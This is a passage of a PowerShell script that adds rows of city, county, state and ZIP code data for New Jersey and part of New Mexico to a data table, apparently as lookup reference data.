jersey","NJ","34","08006") + $null = $Cities.Rows.Add("Barrington","Camden","New jersey","NJ","34","08007") + $null = $Cities.Rows.Add("Harvey cedars","Ocean","New jersey","NJ","34","08008") + $null = $Cities.Rows.Add("Berlin","Camden","New jersey","NJ","34","08009") + $null = $Cities.Rows.Add("Beverly","Burlington","New jersey","NJ","34","08010") + $null = $Cities.Rows.Add("Birmingham","Burlington","New jersey","NJ","34","08011") + $null = $Cities.Rows.Add("Washington","Camden","New jersey","NJ","34","08012") + $null = $Cities.Rows.Add("Bridgeport","Gloucester","New jersey","NJ","34","08014") + $null = $Cities.Rows.Add("Browns mills","Burlington","New jersey","NJ","34","08015") + $null = $Cities.Rows.Add("Burlington","Burlington","New jersey","NJ","34","08016") + $null = $Cities.Rows.Add("Chatsworth","Burlington","New jersey","NJ","34","08019") + $null = $Cities.Rows.Add("Clarksboro","Gloucester","New jersey","NJ","34","08020") + $null = $Cities.Rows.Add("Laurel springs","Camden","New jersey","NJ","34","08021") + $null = $Cities.Rows.Add("Columbus","Burlington","New jersey","NJ","34","08022") + $null = $Cities.Rows.Add("Deepwater","Salem","New jersey","NJ","34","08023") + $null = $Cities.Rows.Add("Gibbsboro","Camden","New jersey","NJ","34","08026") + $null = $Cities.Rows.Add("Gibbstown","Gloucester","New jersey","NJ","34","08027") + $null = $Cities.Rows.Add("Glassboro","Gloucester","New jersey","NJ","34","08028") + $null = $Cities.Rows.Add("Glendora","Camden","New jersey","NJ","34","08029") + $null = $Cities.Rows.Add("Gloucester city","Camden","New jersey","NJ","34","08030") + $null = $Cities.Rows.Add("Bellmawr","Camden","New jersey","NJ","34","08031") + $null = $Cities.Rows.Add("Grenloch","Gloucester","New jersey","NJ","34","08032") + $null = $Cities.Rows.Add("Haddonfield","Camden","New jersey","NJ","34","08033") + $null = $Cities.Rows.Add("Cherry hill","Camden","New jersey","NJ","34","08034") + $null = $Cities.Rows.Add("Haddon heights","Camden","New jersey","NJ","34","08035") + $null = $Cities.Rows.Add("Hainesport","Burlington","New jersey","NJ","34","08036") + $null = $Cities.Rows.Add("Batsto","Atlantic","New jersey","NJ","34","08037") + $null = $Cities.Rows.Add("Hancocks bridge","Salem","New jersey","NJ","34","08038") + $null = $Cities.Rows.Add("Harrisonville","Gloucester","New jersey","NJ","34","08039") + $null = $Cities.Rows.Add("Jobstown","Burlington","New jersey","NJ","34","08041") + $null = $Cities.Rows.Add("Juliustown","Burlington","New jersey","NJ","34","08042") + $null = $Cities.Rows.Add("Voorhees","Camden","New jersey","NJ","34","08043") + $null = $Cities.Rows.Add("Lawnside","Camden","New jersey","NJ","34","08045") + $null = $Cities.Rows.Add("Willingboro","Burlington","New jersey","NJ","34","08046") + $null = $Cities.Rows.Add("Lumberton","Burlington","New jersey","NJ","34","08048") + $null = $Cities.Rows.Add("Magnolia","Camden","New jersey","NJ","34","08049") + $null = $Cities.Rows.Add("Manahawkin","Ocean","New jersey","NJ","34","08050") + $null = $Cities.Rows.Add("Mantua","Gloucester","New jersey","NJ","34","08051") + $null = $Cities.Rows.Add("Maple shade","Burlington","New jersey","NJ","34","08052") + $null = $Cities.Rows.Add("Marlton","Burlington","New jersey","NJ","34","08053") + $null = $Cities.Rows.Add("Mount laurel","Burlington","New jersey","NJ","34","08054") + $null = $Cities.Rows.Add("Medford lakes","Burlington","New jersey","NJ","34","08055") + $null = $Cities.Rows.Add("Mickleton","Gloucester","New jersey","NJ","34","08056") + $null = $Cities.Rows.Add("Moorestown","Burlington","New jersey","NJ","34","08057") + $null = $Cities.Rows.Add("Mount ephraim","Camden","New jersey","NJ","34","08059") + $null = $Cities.Rows.Add("Eastampton twp","Burlington","New jersey","NJ","34","08060") + $null = $Cities.Rows.Add("Mount royal","Gloucester","New jersey","NJ","34","08061") + $null = $Cities.Rows.Add("Mullica hill","Gloucester","New jersey","NJ","34","08062") + $null = $Cities.Rows.Add("National park","Gloucester","New jersey","NJ","34","08063") + $null = $Cities.Rows.Add("New lisbon","Burlington","New jersey","NJ","34","08064") + $null = $Cities.Rows.Add("Palmyra","Burlington","New jersey","NJ","34","08065") + $null = $Cities.Rows.Add("Paulsboro","Gloucester","New jersey","NJ","34","08066") + $null = $Cities.Rows.Add("Pedricktown","Salem","New jersey","NJ","34","08067") + $null = $Cities.Rows.Add("Pemberton","Burlington","New jersey","NJ","34","08068") + $null = $Cities.Rows.Add("Carneys point","Salem","New jersey","NJ","34","08069") + $null = $Cities.Rows.Add("Pennsville","Salem","New jersey","NJ","34","08070") + $null = $Cities.Rows.Add("Pitman","Gloucester","New jersey","NJ","34","08071") + $null = $Cities.Rows.Add("Quinton","Salem","New jersey","NJ","34","08072") + $null = $Cities.Rows.Add("Rancocas","Burlington","New jersey","NJ","34","08073") + $null = $Cities.Rows.Add("Richwood","Gloucester","New jersey","NJ","34","08074") + $null = $Cities.Rows.Add("Delanco","Burlington","New jersey","NJ","34","08075") + $null = $Cities.Rows.Add("Cinnaminson","Burlington","New jersey","NJ","34","08077") + $null = $Cities.Rows.Add("Runnemede","Camden","New jersey","NJ","34","08078") + $null = $Cities.Rows.Add("Salem","Salem","New jersey","NJ","34","08079") + $null = $Cities.Rows.Add("Sewell","Gloucester","New jersey","NJ","34","08080") + $null = $Cities.Rows.Add("Sicklerville","Camden","New jersey","NJ","34","08081") + $null = $Cities.Rows.Add("Somerdale","Camden","New jersey","NJ","34","08083") + $null = $Cities.Rows.Add("Stratford","Camden","New jersey","NJ","34","08084") + $null = $Cities.Rows.Add("Swedesboro","Gloucester","New jersey","NJ","34","08085") + $null = $Cities.Rows.Add("Thorofare","Gloucester","New jersey","NJ","34","08086") + $null = $Cities.Rows.Add("Tuckerton","Ocean","New jersey","NJ","34","08087") + $null = $Cities.Rows.Add("Southampton","Burlington","New jersey","NJ","34","08088") + $null = $Cities.Rows.Add("Waterford works","Camden","New jersey","NJ","34","08089") + $null = $Cities.Rows.Add("Wenonah","Gloucester","New jersey","NJ","34","08090") + $null = $Cities.Rows.Add("West berlin","Camden","New jersey","NJ","34","08091") + $null = $Cities.Rows.Add("West creek","Ocean","New jersey","NJ","34","08092") + $null = $Cities.Rows.Add("Westville","Gloucester","New jersey","NJ","34","08093") + $null = $Cities.Rows.Add("Williamstown","Gloucester","New jersey","NJ","34","08094") + $null = $Cities.Rows.Add("Winslow","Camden","New jersey","NJ","34","08095") + $null = $Cities.Rows.Add("Deptford","Gloucester","New jersey","NJ","34","08096") + $null = $Cities.Rows.Add("Woodbury heights","Gloucester","New jersey","NJ","34","08097") + $null = $Cities.Rows.Add("Woodstown","Salem","New jersey","NJ","34","08098") + $null = $Cities.Rows.Add("Zcta 080hh","Atlantic","New jersey","NJ","34","080HH") + $null = $Cities.Rows.Add("Zcta 080xx","Burlington","New jersey","NJ","34","080XX") + $null = $Cities.Rows.Add("Camden","Camden","New jersey","NJ","34","08102") + $null = $Cities.Rows.Add("Camden","Camden","New jersey","NJ","34","08103") + $null = $Cities.Rows.Add("Camden","Camden","New jersey","NJ","34","08104") + $null = $Cities.Rows.Add("Camden","Camden","New jersey","NJ","34","08105") + $null = $Cities.Rows.Add("Audubon","Camden","New jersey","NJ","34","08106") + $null = $Cities.Rows.Add("Oaklyn","Camden","New jersey","NJ","34","08107") + $null = $Cities.Rows.Add("Collingswood","Camden","New jersey","NJ","34","08108") + $null = $Cities.Rows.Add("Merchantville","Camden","New jersey","NJ","34","08109") + $null = $Cities.Rows.Add("Delair","Camden","New jersey","NJ","34","08110") + $null = $Cities.Rows.Add("Zcta 081hh","Camden","New jersey","NJ","34","081HH") + $null = $Cities.Rows.Add("Smithville","Atlantic","New jersey","NJ","34","08201") + $null = $Cities.Rows.Add("Avalon","Cape May","New jersey","NJ","34","08202") + $null = $Cities.Rows.Add("Brigantine","Atlantic","New jersey","NJ","34","08203") + $null = $Cities.Rows.Add("North cape may","Cape May","New jersey","NJ","34","08204") + $null = $Cities.Rows.Add("Cape may court h","Cape May","New jersey","NJ","34","08210") + $null = $Cities.Rows.Add("Cape may point","Cape May","New jersey","NJ","34","08212") + $null = $Cities.Rows.Add("Egg harbor city","Atlantic","New jersey","NJ","34","08215") + $null = $Cities.Rows.Add("Elwood","Atlantic","New jersey","NJ","34","08217") + $null = $Cities.Rows.Add("Linwood","Atlantic","New jersey","NJ","34","08221") + $null = $Cities.Rows.Add("Marmora","Cape May","New jersey","NJ","34","08223") + $null = $Cities.Rows.Add("New gretna","Burlington","New jersey","NJ","34","08224") + $null = $Cities.Rows.Add("Northfield","Atlantic","New jersey","NJ","34","08225") + $null = $Cities.Rows.Add("Ocean city","Cape May","New jersey","NJ","34","08226") + $null = $Cities.Rows.Add("Ocean view","Cape May","New jersey","NJ","34","08230") + $null = $Cities.Rows.Add("Pleasantville","Atlantic","New jersey","NJ","34","08232") + $null = $Cities.Rows.Add("Zcta 08234","Atlantic","New jersey","NJ","34","08234") + $null = $Cities.Rows.Add("Port republic","Atlantic","New jersey","NJ","34","08241") + $null = $Cities.Rows.Add("Rio grande","Cape May","New jersey","NJ","34","08242") + $null = $Cities.Rows.Add("Townsends inlet","Cape May","New jersey","NJ","34","08243") + $null = $Cities.Rows.Add("Somers point","Atlantic","New jersey","NJ","34","08244") + $null = $Cities.Rows.Add("South dennis","Cape May","New jersey","NJ","34","08245") + $null = $Cities.Rows.Add("Stone harbor","Cape May","New jersey","NJ","34","08247") + $null = $Cities.Rows.Add("Strathmere","Cape May","New jersey","NJ","34","08248") + $null = $Cities.Rows.Add("Villas","Cape May","New jersey","NJ","34","08251") + $null = $Cities.Rows.Add("Whitesboro","Cape May","New jersey","NJ","34","08252") + $null = $Cities.Rows.Add("North wildwood","Cape May","New jersey","NJ","34","08260") + $null = $Cities.Rows.Add("Corbin city","Cape May","New jersey","NJ","34","08270") + $null = $Cities.Rows.Add("Zcta 082hh","Atlantic","New jersey","NJ","34","082HH") + $null = $Cities.Rows.Add("Seabrook","Cumberland","New jersey","NJ","34","08302") + $null = $Cities.Rows.Add("Buena","Atlantic","New jersey","NJ","34","08310") + $null = $Cities.Rows.Add("Cedarville","Cumberland","New jersey","NJ","34","08311") + $null = $Cities.Rows.Add("Clayton","Gloucester","New jersey","NJ","34","08312") + $null = $Cities.Rows.Add("Deerfield street","Cumberland","New jersey","NJ","34","08313") + $null = $Cities.Rows.Add("Delmont","Cumberland","New jersey","NJ","34","08314") + $null = $Cities.Rows.Add("Dorchester","Cumberland","New jersey","NJ","34","08316") + $null = $Cities.Rows.Add("Dorothy","Atlantic","New jersey","NJ","34","08317") + $null = $Cities.Rows.Add("Elmer","Salem","New jersey","NJ","34","08318") + $null = $Cities.Rows.Add("Estell manor","Atlantic","New jersey","NJ","34","08319") + $null = $Cities.Rows.Add("Fortescue","Cumberland","New jersey","NJ","34","08321") + $null = $Cities.Rows.Add("Franklinville","Gloucester","New jersey","NJ","34","08322") + $null = $Cities.Rows.Add("Greenwich","Cumberland","New jersey","NJ","34","08323") + $null = $Cities.Rows.Add("Heislerville","Cumberland","New jersey","NJ","34","08324") + $null = $Cities.Rows.Add("Landisville","Atlantic","New jersey","NJ","34","08326") + $null = $Cities.Rows.Add("Leesburg","Cumberland","New jersey","NJ","34","08327") + $null = $Cities.Rows.Add("Malaga","Gloucester","New jersey","NJ","34","08328") + $null = $Cities.Rows.Add("Mauricetown","Cumberland","New jersey","NJ","34","08329") + $null = $Cities.Rows.Add("Mays landing","Atlantic","New jersey","NJ","34","08330") + $null = $Cities.Rows.Add("Millville","Cumberland","New jersey","NJ","34","08332") + $null = $Cities.Rows.Add("Milmay","Atlantic","New jersey","NJ","34","08340") + $null = $Cities.Rows.Add("Minotola","Atlantic","New jersey","NJ","34","08341") + $null = $Cities.Rows.Add("Monroeville","Gloucester","New jersey","NJ","34","08343") + $null = $Cities.Rows.Add("Newfield","Gloucester","New jersey","NJ","34","08344") + $null = $Cities.Rows.Add("Newport","Cumberland","New jersey","NJ","34","08345") + $null = $Cities.Rows.Add("Newtonville","Atlantic","New jersey","NJ","34","08346") + $null = $Cities.Rows.Add("Port elizabeth","Cumberland","New jersey","NJ","34","08348") + $null = $Cities.Rows.Add("Port norris","Cumberland","New jersey","NJ","34","08349") + $null = $Cities.Rows.Add("Richland","Atlantic","New jersey","NJ","34","08350") + $null = $Cities.Rows.Add("Rosenhayn","Cumberland","New jersey","NJ","34","08352") + $null = $Cities.Rows.Add("Shiloh","Cumberland","New jersey","NJ","34","08353") + $null = $Cities.Rows.Add("Vineland","Cumberland","New jersey","NJ","34","08360") + $null = $Cities.Rows.Add("Zcta 08361","Cumberland","New jersey","NJ","34","08361") + $null = $Cities.Rows.Add("Zcta 083hh","Atlantic","New jersey","NJ","34","083HH") + $null = $Cities.Rows.Add("Zcta 083xx","Cumberland","New jersey","NJ","34","083XX") + $null = $Cities.Rows.Add("Atlantic city","Atlantic","New jersey","NJ","34","08401") + $null = $Cities.Rows.Add("Margate city","Atlantic","New jersey","NJ","34","08402") + $null = $Cities.Rows.Add("Longport","Atlantic","New jersey","NJ","34","08403") + $null = $Cities.Rows.Add("Ventnor city","Atlantic","New jersey","NJ","34","08406") + $null = $Cities.Rows.Add("Zcta 084hh","Atlantic","New jersey","NJ","34","084HH") + $null = $Cities.Rows.Add("Allentown","Monmouth","New jersey","NJ","34","08501") + $null = $Cities.Rows.Add("Belle mead","Somerset","New jersey","NJ","34","08502") + $null = $Cities.Rows.Add("Bordentown","Burlington","New jersey","NJ","34","08505") + $null = $Cities.Rows.Add("Clarksburg","Monmouth","New jersey","NJ","34","08510") + $null = $Cities.Rows.Add("Cookstown","Burlington","New jersey","NJ","34","08511") + $null = $Cities.Rows.Add("Cranbury","Mercer","New jersey","NJ","34","08512") + $null = $Cities.Rows.Add("Creamridge","Monmouth","New jersey","NJ","34","08514") + $null = $Cities.Rows.Add("Crosswicks","Burlington","New jersey","NJ","34","08515") + $null = $Cities.Rows.Add("Florence","Burlington","New jersey","NJ","34","08518") + $null = $Cities.Rows.Add("Hightstown","Mercer","New jersey","NJ","34","08520") + $null = $Cities.Rows.Add("Hopewell","Mercer","New jersey","NJ","34","08525") + $null = $Cities.Rows.Add("Jackson","Ocean","New jersey","NJ","34","08527") + $null = $Cities.Rows.Add("Kingston","Somerset","New jersey","NJ","34","08528") + $null = $Cities.Rows.Add("Lambertville","Hunterdon","New jersey","NJ","34","08530") + $null = $Cities.Rows.Add("New egypt","Ocean","New jersey","NJ","34","08533") + $null = $Cities.Rows.Add("Pennington","Mercer","New jersey","NJ","34","08534") + $null = $Cities.Rows.Add("Perrineville","Monmouth","New jersey","NJ","34","08535") + $null = $Cities.Rows.Add("Plainsboro","Middlesex","New jersey","NJ","34","08536") + $null = $Cities.Rows.Add("Princeton","Mercer","New jersey","NJ","34","08540") + $null = $Cities.Rows.Add("Princeton","Mercer","New jersey","NJ","34","08542") + $null = $Cities.Rows.Add("Princeton juncti","Mercer","New jersey","NJ","34","08550") + $null = $Cities.Rows.Add("Ringoes","Hunterdon","New jersey","NJ","34","08551") + $null = $Cities.Rows.Add("Rocky hill","Somerset","New jersey","NJ","34","08553") + $null = $Cities.Rows.Add("Roebling","Burlington","New jersey","NJ","34","08554") + $null = $Cities.Rows.Add("Roosevelt","Monmouth","New jersey","NJ","34","08555") + $null = $Cities.Rows.Add("Skillman","Somerset","New jersey","NJ","34","08558") + $null = $Cities.Rows.Add("Stockton","Hunterdon","New jersey","NJ","34","08559") + $null = $Cities.Rows.Add("Titusville","Mercer","New jersey","NJ","34","08560") + $null = $Cities.Rows.Add("Windsor","Mercer","New jersey","NJ","34","08561") + $null = $Cities.Rows.Add("Wrightstown","Burlington","New jersey","NJ","34","08562") + $null = $Cities.Rows.Add("Zcta 085hh","Burlington","New jersey","NJ","34","085HH") + $null = $Cities.Rows.Add("Trenton","Mercer","New jersey","NJ","34","08608") + $null = $Cities.Rows.Add("Hamilton","Mercer","New jersey","NJ","34","08609") + $null = $Cities.Rows.Add("Hamilton","Mercer","New jersey","NJ","34","08610") + $null = $Cities.Rows.Add("Hamilton","Mercer","New jersey","NJ","34","08611") + $null = $Cities.Rows.Add("Trenton","Mercer","New jersey","NJ","34","08618") + $null = $Cities.Rows.Add("Mercerville","Mercer","New jersey","NJ","34","08619") + $null = $Cities.Rows.Add("Yardville","Mercer","New jersey","NJ","34","08620") + $null = $Cities.Rows.Add("Trenton","Mercer","New jersey","NJ","34","08625") + $null = $Cities.Rows.Add("West trenton","Mercer","New jersey","NJ","34","08628") + $null = $Cities.Rows.Add("Hamilton","Mercer","New jersey","NJ","34","08629") + $null = $Cities.Rows.Add("Trenton","Mercer","New jersey","NJ","34","08638") + $null = $Cities.Rows.Add("Fort dix","Burlington","New jersey","NJ","34","08640") + $null = $Cities.Rows.Add("Mc guire afb","Burlington","New jersey","NJ","34","08641") + $null = $Cities.Rows.Add("Lawrenceville","Mercer","New jersey","NJ","34","08648") + $null = $Cities.Rows.Add("Hamilton","Mercer","New jersey","NJ","34","08690") + $null = $Cities.Rows.Add("Hamilton","Mercer","New jersey","NJ","34","08691") + $null = $Cities.Rows.Add("Zcta 086hh","Burlington","New jersey","NJ","34","086HH") + $null = $Cities.Rows.Add("Lakewood","Ocean","New jersey","NJ","34","08701") + $null = $Cities.Rows.Add("Allenwood","Monmouth","New jersey","NJ","34","08720") + $null = $Cities.Rows.Add("Bayville","Ocean","New jersey","NJ","34","08721") + $null = $Cities.Rows.Add("Beachwood","Ocean","New jersey","NJ","34","08722") + $null = $Cities.Rows.Add("Osbornsville","Ocean","New jersey","NJ","34","08723") + $null = $Cities.Rows.Add("Brick","Ocean","New jersey","NJ","34","08724") + $null = $Cities.Rows.Add("Brielle","Monmouth","New jersey","NJ","34","08730") + $null = $Cities.Rows.Add("Forked river","Ocean","New jersey","NJ","34","08731") + $null = $Cities.Rows.Add("Island heights","Ocean","New jersey","NJ","34","08732") + $null = $Cities.Rows.Add("Lakehurst naec","Ocean","New jersey","NJ","34","08733") + $null = $Cities.Rows.Add("Lanoka harbor","Ocean","New jersey","NJ","34","08734") + $null = $Cities.Rows.Add("Lavallette","Ocean","New jersey","NJ","34","08735") + $null = $Cities.Rows.Add("Manasquan","Monmouth","New jersey","NJ","34","08736") + $null = $Cities.Rows.Add("Mantoloking","Ocean","New jersey","NJ","34","08738") + $null = $Cities.Rows.Add("Ocean gate","Ocean","New jersey","NJ","34","08740") + $null = $Cities.Rows.Add("Pine beach","Ocean","New jersey","NJ","34","08741") + $null = $Cities.Rows.Add("Bay head","Ocean","New jersey","NJ","34","08742") + $null = $Cities.Rows.Add("Sea girt","Monmouth","New jersey","NJ","34","08750") + $null = $Cities.Rows.Add("Seaside heights","Ocean","New jersey","NJ","34","08751") + $null = $Cities.Rows.Add("Seaside park","Ocean","New jersey","NJ","34","08752") + $null = $Cities.Rows.Add("Toms river","Ocean","New jersey","NJ","34","08753") + $null = $Cities.Rows.Add("Toms river","Ocean","New jersey","NJ","34","08755") + $null = $Cities.Rows.Add("Toms river","Ocean","New jersey","NJ","34","08757") + $null = $Cities.Rows.Add("Waretown","Ocean","New jersey","NJ","34","08758") + $null = $Cities.Rows.Add("Whiting","Ocean","New jersey","NJ","34","08759") + $null = $Cities.Rows.Add("Zcta 087hh","Monmouth","New jersey","NJ","34","087HH") + $null = $Cities.Rows.Add("Zcta 087xx","Ocean","New jersey","NJ","34","087XX") + $null = $Cities.Rows.Add("Annandale","Hunterdon","New jersey","NJ","34","08801") + $null = $Cities.Rows.Add("Pattenburg","Hunterdon","New jersey","NJ","34","08802") + $null = $Cities.Rows.Add("Bloomsbury","Hunterdon","New jersey","NJ","34","08804") + $null = $Cities.Rows.Add("Bound brook","Somerset","New jersey","NJ","34","08805") + $null = $Cities.Rows.Add("Bridgewater","Somerset","New jersey","NJ","34","08807") + $null = $Cities.Rows.Add("Clinton","Hunterdon","New jersey","NJ","34","08809") + $null = $Cities.Rows.Add("Dayton","Middlesex","New jersey","NJ","34","08810") + $null = $Cities.Rows.Add("Green brook","Middlesex","New jersey","NJ","34","08812") + $null = $Cities.Rows.Add("East brunswick","Middlesex","New jersey","NJ","34","08816") + $null = $Cities.Rows.Add("Edison","Middlesex","New jersey","NJ","34","08817") + $null = $Cities.Rows.Add("Edison","Middlesex","New jersey","NJ","34","08820") + $null = $Cities.Rows.Add("Flagtown","Somerset","New jersey","NJ","34","08821") + $null = $Cities.Rows.Add("Flemington","Hunterdon","New jersey","NJ","34","08822") + $null = $Cities.Rows.Add("Franklin park","Somerset","New jersey","NJ","34","08823") + $null = $Cities.Rows.Add("Kendall park","Middlesex","New jersey","NJ","34","08824") + $null = $Cities.Rows.Add("Frenchtown","Hunterdon","New jersey","NJ","34","08825") + $null = $Cities.Rows.Add("Glen gardner","Hunterdon","New jersey","NJ","34","08826") + $null = $Cities.Rows.Add("Hampton","Hunterdon","New jersey","NJ","34","08827") + $null = $Cities.Rows.Add("Helmetta","Middlesex","New jersey","NJ","34","08828") + $null = $Cities.Rows.Add("High bridge","Hunterdon","New jersey","NJ","34","08829") + $null = $Cities.Rows.Add("Iselin","Middlesex","New jersey","NJ","34","08830") + $null = $Cities.Rows.Add("Jamesburg","Middlesex","New jersey","NJ","34","08831") + $null = $Cities.Rows.Add("Keasbey","Middlesex","New jersey","NJ","34","08832") + $null = $Cities.Rows.Add("Lebanon","Hunterdon","New jersey","NJ","34","08833") + $null = $Cities.Rows.Add("Manville","Somerset","New jersey","NJ","34","08835") + $null = $Cities.Rows.Add("Martinsville","Somerset","New jersey","NJ","34","08836") + $null = $Cities.Rows.Add("Edison","Middlesex","New jersey","NJ","34","08837") + $null = $Cities.Rows.Add("Metuchen","Middlesex","New jersey","NJ","34","08840") + $null = $Cities.Rows.Add("Middlesex","Middlesex","New jersey","NJ","34","08846") + $null = $Cities.Rows.Add("Milford","Hunterdon","New jersey","NJ","34","08848") + $null = $Cities.Rows.Add("Milltown","Middlesex","New jersey","NJ","34","08850") + $null = $Cities.Rows.Add("Monmouth junctio","Middlesex","New jersey","NJ","34","08852") + $null = $Cities.Rows.Add("Neshanic station","Somerset","New jersey","NJ","34","08853") + $null = $Cities.Rows.Add("Piscataway","Middlesex","New jersey","NJ","34","08854") + $null = $Cities.Rows.Add("Old bridge","Middlesex","New jersey","NJ","34","08857") + $null = $Cities.Rows.Add("Oldwick","Hunterdon","New jersey","NJ","34","08858") + $null = $Cities.Rows.Add("Parlin","Middlesex","New jersey","NJ","34","08859") + $null = $Cities.Rows.Add("Perth amboy","Middlesex","New jersey","NJ","34","08861") + $null = $Cities.Rows.Add("Fords","Middlesex","New jersey","NJ","34","08863") + $null = $Cities.Rows.Add("Alpha","Warren","New jersey","NJ","34","08865") + $null = $Cities.Rows.Add("Pittstown","Hunterdon","New jersey","NJ","34","08867") + $null = $Cities.Rows.Add("Raritan","Somerset","New jersey","NJ","34","08869") + $null = $Cities.Rows.Add("Sayreville","Middlesex","New jersey","NJ","34","08872") + $null = $Cities.Rows.Add("Somerset","Somerset","New jersey","NJ","34","08873") + $null = $Cities.Rows.Add("North branch","Somerset","New jersey","NJ","34","08876") + $null = $Cities.Rows.Add("Laurence harbor","Middlesex","New jersey","NJ","34","08879") + $null = $Cities.Rows.Add("South bound broo","Somerset","New jersey","NJ","34","08880") + $null = $Cities.Rows.Add("South river","Middlesex","New jersey","NJ","34","08882") + $null = $Cities.Rows.Add("Spotswood","Middlesex","New jersey","NJ","34","08884") + $null = $Cities.Rows.Add("Stewartsville","Warren","New jersey","NJ","34","08886") + $null = $Cities.Rows.Add("Three bridges","Hunterdon","New jersey","NJ","34","08887") + $null = $Cities.Rows.Add("Whitehouse stati","Hunterdon","New jersey","NJ","34","08889") + $null = $Cities.Rows.Add("Zcta 088hh","Hunterdon","New jersey","NJ","34","088HH") + $null = $Cities.Rows.Add("New brunswick","Middlesex","New jersey","NJ","34","08901") + $null = $Cities.Rows.Add("North brunswick","Middlesex","New jersey","NJ","34","08902") + $null = $Cities.Rows.Add("Highland park","Middlesex","New jersey","NJ","34","08904") + $null = $Cities.Rows.Add("Zcta 089hh","Middlesex","New jersey","NJ","34","089HH") + $null = $Cities.Rows.Add("","Hudson","New jersey","NJ","34","10004") + $null = $Cities.Rows.Add("","Dona Ana","New mexico","NM","35","79922") + $null = $Cities.Rows.Add("","Hidalgo","New mexico","NM","35","85534") + $null = $Cities.Rows.Add("","McKinley","New mexico","NM","35","86504") + $null = $Cities.Rows.Add("","McKinley","New mexico","NM","35","86508") + $null = $Cities.Rows.Add("","San Juan","New mexico","NM","35","86514") + $null = $Cities.Rows.Add("","McKinley","New mexico","NM","35","86515") + $null = $Cities.Rows.Add("Algodones","Sandoval","New mexico","NM","35","87001") + $null = $Cities.Rows.Add("Boys ranch","Valencia","New mexico","NM","35","87002") + $null = $Cities.Rows.Add("Bernalillo","Sandoval","New mexico","NM","35","87004") + $null = $Cities.Rows.Add("Bluewater","Cibola","New mexico","NM","35","87005") + $null = $Cities.Rows.Add("Bosque","Socorro","New mexico","NM","35","87006") + $null = $Cities.Rows.Add("Casa blanca","Cibola","New mexico","NM","35","87007") + $null = $Cities.Rows.Add("Cedar crest","Bernalillo","New mexico","NM","35","87008") + $null = $Cities.Rows.Add("Cerrillos","Santa Fe","New mexico","NM","35","87010") + $null = $Cities.Rows.Add("Claunch","Socorro","New mexico","NM","35","87011") + $null = $Cities.Rows.Add("Coyote","Rio Arriba","New mexico","NM","35","87012") + $null = $Cities.Rows.Add("Cuba","Sandoval","New mexico","NM","35","87013") + $null = $Cities.Rows.Add("Cubero","Cibola","New mexico","NM","35","87014") + $null = $Cities.Rows.Add("Edgewood","Santa Fe","New mexico","NM","35","87015") + $null = $Cities.Rows.Add("Estancia","Torrance","New mexico","NM","35","87016") + $null = $Cities.Rows.Add("Gallina","Rio Arriba","New mexico","NM","35","87017") + $null = $Cities.Rows.Add("Counselor","Sandoval","New mexico","NM","35","87018") + $null = $Cities.Rows.Add("Grants","Cibola","New mexico","NM","35","87020") + $null = $Cities.Rows.Add("Isleta","Bernalillo","New mexico","NM","35","87022") + $null = $Cities.Rows.Add("Jarales","Valencia","New mexico","NM","35","87023") + $null = $Cities.Rows.Add("Jemez pueblo","Sandoval","New mexico","NM","35","87024") + $null = $Cities.Rows.Add("Jemez springs","Sandoval","New mexico","NM","35","87025") + $null = $Cities.Rows.Add("Canoncito","Bernalillo","New mexico","NM","35","87026") + $null = $Cities.Rows.Add("La jara","Sandoval","New mexico","NM","35","87027") + $null = $Cities.Rows.Add("Lajoya","Socorro","New mexico","NM","35","87028") + $null = $Cities.Rows.Add("Lindrith","Rio Arriba","New mexico","NM","35","87029") + $null = $Cities.Rows.Add("Los lunas","Valencia","New mexico","NM","35","87031") + $null = $Cities.Rows.Add("Mc intosh","Torrance","New mexico","NM","35","87032") + $null = $Cities.Rows.Add("Pueblo of acoma","Cibola","New mexico","NM","35","87034") + $null = $Cities.Rows.Add("Moriarty","Torrance","New mexico","NM","35","87035") + $null = $Cities.Rows.Add("Mountainair","Torrance","New mexico","NM","35","87036") + $null = $Cities.Rows.Add("Nageezi","San Juan","New mexico","NM","35","87037") + $null = $Cities.Rows.Add("New laguna","Cibola","New mexico","NM","35","87038") + $null = $Cities.Rows.Add("Paguate","Cibola","New mexico","NM","35","87040") + $null = $Cities.Rows.Add("Cochiti pueblo","Sandoval","New mexico","NM","35","87041") + $null = $Cities.Rows.Add("Peralta","Valencia","New mexico","NM","35","87042") + $null = $Cities.Rows.Add("Placitas","Sandoval","New mexico","NM","35","87043") + $null = $Cities.Rows.Add("Ponderosa","Sandoval","New mexico","NM","35","87044") + $null = $Cities.Rows.Add("Prewitt","McKinley","New mexico","NM","35","87045") + $null = $Cities.Rows.Add("Sandia park","Bernalillo","New mexico","NM","35","87047") + $null = $Cities.Rows.Add("Corrales","Sandoval","New mexico","NM","35","87048") + $null = $Cities.Rows.Add("San fidel","Cibola","New mexico","NM","35","87049") + $null = $Cities.Rows.Add("Santo domingo pu","Sandoval","New mexico","NM","35","87052") + $null = $Cities.Rows.Add("Zia pueblo","Sandoval","New mexico","NM","35","87053") + $null = $Cities.Rows.Add("Stanley","Santa Fe","New mexico","NM","35","87056") + $null = $Cities.Rows.Add("Tijeras","Bernalillo","New mexico","NM","35","87059") + $null = $Cities.Rows.Add("Tome","Valencia","New mexico","NM","35","87060") + $null = $Cities.Rows.Add("Torreon","Torrance","New mexico","NM","35","87061") + $null = $Cities.Rows.Add("Veguita","Socorro","New mexico","NM","35","87062") + $null = $Cities.Rows.Add("Willard","Torrance","New mexico","NM","35","87063") + $null = $Cities.Rows.Add("Youngsville","Rio Arriba","New mexico","NM","35","87064") + $null = $Cities.Rows.Add("Bosque farms","Valencia","New mexico","NM","35","87068") + $null = $Cities.Rows.Add("Clines corners","Torrance","New mexico","NM","35","87070") + $null = $Cities.Rows.Add("Cochiti pueblo","Sandoval","New mexico","NM","35","87072") + $null = $Cities.Rows.Add("Cochiti lake","Sandoval","New mexico","NM","35","87083") + $null = $Cities.Rows.Add("Zcta 870hh","Bernalillo","New mexico","NM","35","870HH") + $null = $Cities.Rows.Add("Zcta 870xx","Cibola","New mexico","NM","35","870XX") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87102") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87104") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87105") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87106") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87107") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87108") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87109") + $null = 